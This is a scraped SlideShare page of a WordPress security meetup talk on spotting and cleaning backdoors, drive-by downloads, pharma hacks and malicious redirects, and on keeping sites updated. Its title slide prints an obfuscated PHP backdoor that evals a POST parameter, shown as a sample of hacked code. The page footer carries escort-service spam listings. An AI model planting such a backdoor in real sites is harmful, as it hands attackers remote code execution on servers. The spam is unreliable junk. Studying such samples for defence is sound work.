SlideShare ist ein Scribd-Unternehmen logo

Security Presentation for Boulder WordPress Meetup

Angela Bowman
Angela Bowman

This is the full presentation for the WordPress Meetup in Boulder on finding hacks, fixing hacks,and keeping your site secure.

Internet
1 von 43
Downloaden Sie, um offline zu lesen
YOUR SITE 
 IS AND IS NOT HACKED @ASKWPGIRL
SCHRODINGER’S WEBSITE You must assume your site is both hacked and not hacked until you open the box and find out. <?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2]. $qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($ {$s20}['q53b3a6']);}?>
WordPress Instructor and Custom Theme Developer Using WordPress Since 2007 —Version 2.2 Not a security expert, but I play one on WordPress.tv Angela Bowman 
 Ask WP Girl @askwpgirl
WHAAA? 1
WHY DO HACKERS HACK? Deface sites for fun Add spammy links to bad web neighborhoods (SEO spam) Hijack site to add spam, porn, gambling, pay-day loans content Steal sensitive information to sell Distribute malware to personal computers Use server resources for 
 distributed attacks
WHAT DO HACKERS ACTUALLY DO? Create new accounts with admin privileges Reset passwords of multiple accounts Inject malicious code into content Add malicious code to existing files or new files Redirect your website by editing .htaccess file http://www.wpmayor.com/wordpress-security-based-facts-statistics/
WHY SHOULD YOU CARE? Your site can start running 
 really slow Your SEO could take a nose 
 dive Your site could be blacklisted or taken down by your web host Your site could be added to the Phish Tank which is hard to get out of You could be sued by 
 customers for damages Your site can become unusable
TYPICALLY, ONLY THE MOST SEVERELY HACKED SITES WILL BE BLACKLISTED OR SUSPENDED BY HOST Many hacks are hidden
WHY ARE WORDPRESS SITES VULNERABLE? PHP and MySQL inherently vulnerable - easy to write hackable code that works! Current WordPress version very secure Themes and plugins not all created equal Hosting security varies Login credentials can be compromised Personal computer may be infected
HACK STATS 29% 8% 22% 41% 41% Hosting 22% Plugins 29% Themes 8% Weak Passwords
RECENT VULNERABILITIES Google Analytics WordPress 4.2.1 Backup to Dropbox FancyBox TwentyFifteen Revolution SliderGravity Forms JetPack Database of all vulnerable plugins and themes: https://wpvulndb.com/
RECENT STATS 100,000+ WordPress Sites 
 Compromised through Slider Revolution 
 SecurityVulnerability 800,000 banking credentials 
 stolen using hacked WordPress sites 600,000 WordPress Websites Compromised through Fancybox Plugin
 SecurityVulnerability http://www.databreachtoday.com/hackers-grab-800000-banking-credentials-a-7416 http://wptavern.com/hackers-hijack-fancybox-plugin-to-deface-wordpress-sites-with-isis-propaganda
LOW HANGING FRUIT Vulnerabilities immediately published on the web Hackers write bots to exploit vulnerabilities Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
COMMON EXPLOITS AND HOW TO FIX 2
1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE SITE CODE AND IT'S IMPOSSIBLE TO DETECT THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
Removing Backdoors Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/ Delete and reinstall WordPress 
 core files, plugins, and themes Check wp-content and 
 uploads folder carefully 
 for hacked PHP files Run https://wordpress.org/plugins/gotmls/ 
 to check for hacked files
 in the wp-content folder Gravity Forms hack which of these files is 
 not like the others?
DIY HACK RECOVERY Via SFTP (preferred) or FTP 1 Backup: Download everything. Good to examine later for details of hack if needed. 2 Delete 
 all except: cgi-bin .htaccess wp-config.php (examine these) 3 Upload fresh: WordPress Themes Plugins cleaned uploads
Hmmmm? PHP in a CSS folder? Look for modified dates Look for unusual names Compare file list to original download Look for file types that don’t belong Check commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php Any file can be hacked!
2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
Cleaning up Drive by Downloads Use Sucuri Sitecheck to scan site; read about hack Disable javascript before hitting your site – don’t want to end up infecting your own computer while checking your site. Remove hacked code from content or files. Commonly hacked core files: index.php and wp_blog_header.php Commonly hacked theme files: index.php, functions.php, header.php, footer.php Monitor site
3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.
Cleaning up Pharma Hack Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to scan site using different devices to find hack Search site with Google Same clean up as 
 Drive by Downloads Can be cross-infected
 from other sites on 
 server/hosting 
 account Read this: https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site- part-i-wordpress-and-the-pharma-hack.html site:yoursitename.com
4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone Hacked .htaccess file
Finding and Removing Malicious Redirects Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time. Use http://www.botsvsbrowsers.com/ SimulateUserAgent.asp to verify Scan with Sucuri’s SiteCheck Check all the .htaccess files on the server and remove the redirect. https://sitecheck.sucuri.net/
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere? Check raw access logs via cPanel db12.php, css.php, dirs35.php???? MONITORING TIPS
Use Google Search Console! Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site. Links toYour Site – you can find suspicious incoming links here. Internal Links – this report can help reveal rogue sections of your site. http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
Check for rogue users and posts Your new admin friends? Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
Audit Activity on Site https://wordpress.org/plugins/wp-simple-firewall/
IMMEDIATELY CHANGE PASSWORDS Use Sucuri plugin to Generate New Security Keys Reset all passwords, including WordPress 
 users, FTP, web hosting, control panel Scan computer for viruses!
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination CLEAN UP “BAD” HACK If hackers got admin access to site or database, you might have to nuke the entire site from orbit — it’s the only way to be sure https://www.youtube.com/watch?v=aCbfMkh940Q Or contact sucuri.net for 
 site clean up and monitoring
REQUEST SITE REVIEW If Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are certain you’ve cleaned up all hacked files:
 https://support.google.com/webmasters/answer/ 168328?hl=en
SECURITY BASICS 3
UPDATE UPDATE UPDATE Timely updates are critical for security. 
 Tools: iControlWP, InfiniteWP, Jetpack, ManageWP, http://askwpgirl.com/updating-wordpress-plugins-themes-core/
UPDATING PREMIUM THEMES AND PLUGINS Often a manual process - Download and FTP new files Bundled plugins are not supported or auto updated Enter license key/purchase code in settings to receive updates http://askwpgirl.com/updating-wordpress-plugins-themes-core/
SECURE YOUR LOGIN Online Generator: 
 http://www.pctools.com/guides/password/ Track Passwords: 
 http://agilebits.com/products/1Password Enable Two-Factor Authentication: http://askwpgirl.com/wordpress-two-factor- authentication-plugins/
RUN A TIGHT SHIP! Delete ALL unused stuff on server Only use popular and well-maintained themes and plugins Don’t allow users to register (Settings > General) Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING Correct File Permissions WordPress Auto Updates Firewall and Scanning Regular Backups Server Security Performance Optimization Managed WordPress Hosts: Site Ground WP Engine Get Flywheel Web Synthesis Pantheon
EFFECTIVE SECURITY PLUGIN FEATURES Limit login access Block bad URL requests 
 with a Firewall Audit activity
 Security through obscurity is not security IP addresses don’t matter and should not be used as the foundation of aWordPress security policy My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/ Does all the above and more.Will notify you of vulnerable plugins.
BACKUPS Common wisdom is to backup your site Backups are to your site what major medical health care coverage is to your health Usually only helpful in case of a disaster Services: VaultPress and WorpDrive good hosted solutions! Plugins: BackupBuddy (paid), BackWPUp, Duplicator
SECURE YOUR COMPUTER Scan for viruses and trojans Be careful about downloading stuff!!!!
RESOURCES http://snipe.net/2010/01/when-wordpress-gets-hacked/ https://support.google.com/webmasters/answer/163633?rd=1 *** http://aw-snap.info/articles/find-backdoor.php http://codex.wordpress.org/FAQ_My_site_was_hacked http://sucuri.net - free scan, hack recovering, site monitoring, 
 great posts on how to clean up specific hacks http://aswkpgirl.com/nuke-it-from-orbit https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4- login-protection-feature/ https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress- misinformation-virus/ About the banking hack: https://www.proofpoint.com/es/node/327 Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
CONTACT facebook.com/askwpgirl 
 twitter.com/askwpgirl 
 http://askwpgirl.com http://boulderdigitalarts.com One-on-One consulting third Friday of every month at Boulder Digital Arts Six-week theme customization course in Colorado and online. SEO and Best Maintenance Tips Newsletter http://askwpgirl.com

Empfohlen

Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Top Draw Inc.
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP Meetup
Oyster Bay Marauders LLC
 
How To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your WordpressHow To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your Wordpress
Chelsea O'Brien
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Security Function
Security FunctionSecurity Function
Security Function
Samuel Soon
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!
Cláudio André
 

Empfohlen

Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Top Draw Inc.
 
Securing your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP MeetupSecuring your WordPress website - New Port Richey WP Meetup
Securing your WordPress website - New Port Richey WP Meetup
Oyster Bay Marauders LLC
 
How To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your WordpressHow To Lock Down And Secure Your Wordpress
How To Lock Down And Secure Your Wordpress
Chelsea O'Brien
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Security Function
Security FunctionSecurity Function
Security Function
Samuel Soon
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
 
Hacker, you shall not pass!
Hacker, you shall not pass!Hacker, you shall not pass!
Hacker, you shall not pass!
Cláudio André
 
What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
Sumedt Jitpukdebodin
 
Web Insecurity And Browser Exploitation
Web Insecurity And Browser ExploitationWeb Insecurity And Browser Exploitation
Web Insecurity And Browser Exploitation
Michele Orru'
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
heikowebers
 
Phpnw security-20111009
Phpnw security-20111009Phpnw security-20111009
Phpnw security-20111009
Paul Lemon
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
wordcampgc
 
WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009
Brad Williams
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
PacSecJP
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
Samvel Gevorgyan
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
Samvel Gevorgyan
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press website
Deola Kayode
 
Tips to improve word press security ppt
Tips to improve word press security pptTips to improve word press security ppt
Tips to improve word press security ppt
Cheap SSL Coupon Code
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Pietro Polsinelli
 
Poisoning Google images
Poisoning Google imagesPoisoning Google images
Poisoning Google images
lukash4
 
Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010
Brad Williams
 
Practical Cyber Attacking Tutorial
Practical Cyber Attacking TutorialPractical Cyber Attacking Tutorial
Practical Cyber Attacking Tutorial
Yam Peleg
 
The Ultimate Guide to Wordpress Security
The Ultimate Guide to Wordpress SecurityThe Ultimate Guide to Wordpress Security
The Ultimate Guide to Wordpress Security
AidanChard
 
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Reducing Server Resources: Improve Costs, SEO, Conversions & UXReducing Server Resources: Improve Costs, SEO, Conversions & UX
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Michael Jones
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
Four Kitchens
 
Secrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSecrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla Revealed
SiteGround.com
 
Fechas Segunda Evaluación 2014-2015
Fechas Segunda Evaluación 2014-2015Fechas Segunda Evaluación 2014-2015
Fechas Segunda Evaluación 2014-2015
Red Ies Torre Almenara
 
Letter of Recommendation
Letter of RecommendationLetter of Recommendation
Letter of Recommendation
Hashim Naseer
 

Weitere ähnliche Inhalte

Was ist angesagt?

Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
heikowebers
 
Phpnw security-20111009
Phpnw security-20111009Phpnw security-20111009
Phpnw security-20111009
Paul Lemon
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
PacSecJP
 
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Reducing Server Resources: Improve Costs, SEO, Conversions & UXReducing Server Resources: Improve Costs, SEO, Conversions & UX
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Michael Jones
 

Was ist angesagt? (20)

What should I do when my website got hack?
What should I do when my website got hack?What should I do when my website got hack?
What should I do when my website got hack?
 
Web Insecurity And Browser Exploitation
Web Insecurity And Browser ExploitationWeb Insecurity And Browser Exploitation
Web Insecurity And Browser Exploitation
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
 
Phpnw security-20111009
Phpnw security-20111009Phpnw security-20111009
Phpnw security-20111009
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009WordPress Security - WordCamp NYC 2009
WordPress Security - WordCamp NYC 2009
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download DetectionDrivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
 
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
Nishimura finding vulnerabilities-in-firefox-for-i-os-(nishimunea)
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
 
WPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press websiteWPSecurity best practices of securing a word press website
WPSecurity best practices of securing a word press website
 
Tips to improve word press security ppt
Tips to improve word press security pptTips to improve word press security ppt
Tips to improve word press security ppt
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Poisoning Google images
Poisoning Google imagesPoisoning Google images
Poisoning Google images
 
Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010Now That's What I Call WordPress Security 2010
Now That's What I Call WordPress Security 2010
 
Practical Cyber Attacking Tutorial
Practical Cyber Attacking TutorialPractical Cyber Attacking Tutorial
Practical Cyber Attacking Tutorial
 
The Ultimate Guide to Wordpress Security
The Ultimate Guide to Wordpress SecurityThe Ultimate Guide to Wordpress Security
The Ultimate Guide to Wordpress Security
 
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Reducing Server Resources: Improve Costs, SEO, Conversions & UXReducing Server Resources: Improve Costs, SEO, Conversions & UX
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
Secrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla RevealedSecrets to a Hack-Proof Joomla Revealed
Secrets to a Hack-Proof Joomla Revealed
 

Andere mochten auch

Letter of Recommendation
Letter of RecommendationLetter of Recommendation
Letter of Recommendation
Hashim Naseer
 
Ip model code of safe practice part 19 2nd ed. jan. 2007 part1
Ip model code of safe practice part 19 2nd ed. jan. 2007 part1Ip model code of safe practice part 19 2nd ed. jan. 2007 part1
Ip model code of safe practice part 19 2nd ed. jan. 2007 part1
Varadaraj Ck
 
Brown-Forman Magazine
Brown-Forman MagazineBrown-Forman Magazine
Brown-Forman Magazine
Robert Graff
 

Andere mochten auch (15)

Fechas Segunda Evaluación 2014-2015
Fechas Segunda Evaluación 2014-2015Fechas Segunda Evaluación 2014-2015
Fechas Segunda Evaluación 2014-2015
 
Letter of Recommendation
Letter of RecommendationLetter of Recommendation
Letter of Recommendation
 
Ciudad bolivar
Ciudad bolivarCiudad bolivar
Ciudad bolivar
 
2015resume
2015resume2015resume
2015resume
 
Fechas Segunda Evaluación 2014-2015
Fechas Segunda Evaluación 2014-2015Fechas Segunda Evaluación 2014-2015
Fechas Segunda Evaluación 2014-2015
 
NILESH
NILESH NILESH
NILESH
 
1 107125834506043395
1 1071258345060433951 107125834506043395
1 107125834506043395
 
Doozie pitch deck 6.0
Doozie pitch deck 6.0Doozie pitch deck 6.0
Doozie pitch deck 6.0
 
How WordPress Works
How WordPress WorksHow WordPress Works
How WordPress Works
 
Ciudadania Digital
Ciudadania DigitalCiudadania Digital
Ciudadania Digital
 
Your WordPress Site is and is not Hacked - You don't know until you check
Your WordPress Site is and is not Hacked - You don't know until you checkYour WordPress Site is and is not Hacked - You don't know until you check
Your WordPress Site is and is not Hacked - You don't know until you check
 
Ip model code of safe practice part 19 2nd ed. jan. 2007 part1
Ip model code of safe practice part 19 2nd ed. jan. 2007 part1Ip model code of safe practice part 19 2nd ed. jan. 2007 part1
Ip model code of safe practice part 19 2nd ed. jan. 2007 part1
 
Brown-Forman Magazine
Brown-Forman MagazineBrown-Forman Magazine
Brown-Forman Magazine
 
The new holocaust history museum 2
The new holocaust history museum 2The new holocaust history museum 2
The new holocaust history museum 2
 
Anit no need foe unright.mini.series.html.doc
Anit no need foe unright.mini.series.html.docAnit no need foe unright.mini.series.html.doc
Anit no need foe unright.mini.series.html.doc
 

Ähnlich wie Security Presentation for Boulder WordPress Meetup

WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012
Angela Bowman
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
Thor Kristiansen
 

Ähnlich wie Security Presentation for Boulder WordPress Meetup (20)

Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not Hacked
 
Hardening WordPress - Friends of Search 2014 (WordPress Security)
Hardening WordPress - Friends of Search 2014 (WordPress Security)Hardening WordPress - Friends of Search 2014 (WordPress Security)
Hardening WordPress - Friends of Search 2014 (WordPress Security)
 
WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012WordPress Security Essentials WordCamp Denver 2012
WordPress Security Essentials WordCamp Denver 2012
 
Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011Securing Your WordPress Website - WordCamp GC 2011
Securing Your WordPress Website - WordCamp GC 2011
 
Securing Word Press Blog
Securing Word Press BlogSecuring Word Press Blog
Securing Word Press Blog
 
WordPress End-User Security
WordPress End-User SecurityWordPress End-User Security
WordPress End-User Security
 
Locking down word press
Locking down word pressLocking down word press
Locking down word press
 
Wordpress Security & Hardening Steps
Wordpress Security & Hardening StepsWordpress Security & Hardening Steps
Wordpress Security & Hardening Steps
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
How to know if your WordPress Website is hacked Get the Inside Story.ppt
How to know if your WordPress Website is hacked Get the Inside Story.pptHow to know if your WordPress Website is hacked Get the Inside Story.ppt
How to know if your WordPress Website is hacked Get the Inside Story.ppt
 
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
Hardening WordPress - SAScon Manchester 2013 (WordPress Security)
 
WordPress Security 101
WordPress Security 101WordPress Security 101
WordPress Security 101
 
Protect Your WordPress From The Inside Out
Protect Your WordPress From The Inside OutProtect Your WordPress From The Inside Out
Protect Your WordPress From The Inside Out
 
Pubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security AuditsPubcon Vegas Session - WordPress Site Security Audits
Pubcon Vegas Session - WordPress Site Security Audits
 
Safari Push Notification
Safari Push NotificationSafari Push Notification
Safari Push Notification
 
WordPress Security
WordPress Security WordPress Security
WordPress Security
 
WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009WordPress Security Updated - NYC Meetup 2009
WordPress Security Updated - NYC Meetup 2009
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 
WordCamp Mid-Atlantic WordPress Security
WordCamp Mid-Atlantic WordPress SecurityWordCamp Mid-Atlantic WordPress Security
WordCamp Mid-Atlantic WordPress Security
 
WordPress Security
WordPress SecurityWordPress Security
WordPress Security
 

Mehr von Angela Bowman

Mehr von Angela Bowman (6)

Creating a style guide for website using Elementor
Creating a style guide for website using ElementorCreating a style guide for website using Elementor
Creating a style guide for website using Elementor
 
Using Custom Post Types and Advanced Custom Fields with Elementor
Using Custom Post Types and Advanced Custom Fields with Elementor Using Custom Post Types and Advanced Custom Fields with Elementor
Using Custom Post Types and Advanced Custom Fields with Elementor
 
Updating WordPress Themes, Plugins, and Core Safely
Updating WordPress Themes, Plugins, and Core SafelyUpdating WordPress Themes, Plugins, and Core Safely
Updating WordPress Themes, Plugins, and Core Safely
 
Web designtrends 5-29-2013
Web designtrends 5-29-2013Web designtrends 5-29-2013
Web designtrends 5-29-2013
 
Really Awesome WordPress Plugins You Should Know About
Really Awesome WordPress Plugins You Should Know AboutReally Awesome WordPress Plugins You Should Know About
Really Awesome WordPress Plugins You Should Know About
 
WordPress Security Essentials
WordPress Security EssentialsWordPress Security Essentials
WordPress Security Essentials
 

Kürzlich hochgeladen

Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort ServiceEnjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Enjoy Night⚡Call Girls Dlf City Phase 3 Gurgaon >༒8448380779 Escort Service
Delhi Call girls
 
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night StandHot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
Hot Call Girls |Delhi |Hauz Khas ☎ 9711199171 Book Your One night Stand
kumarajju5765
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
ruhi
 
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Best VIP Call Girls Noida Sector 75 Call Me: 8448380779
Delhi Call girls
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
 
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Call Girls Service Chandigarh Lucky ❤️ 7710465962 Independent Call Girls In C...
Sheetaleventcompany
 
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Model Towh Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip CallDelhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
Delhi Call Girls Rohini 9711199171 ☎✔👌✔ Whatsapp Hard And Sexy Vip Call
shivangimorya083
 
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
@9999965857 🫦 Sexy Desi Call Girls Laxmi Nagar 💓 High Profile Escorts Delhi 🫶
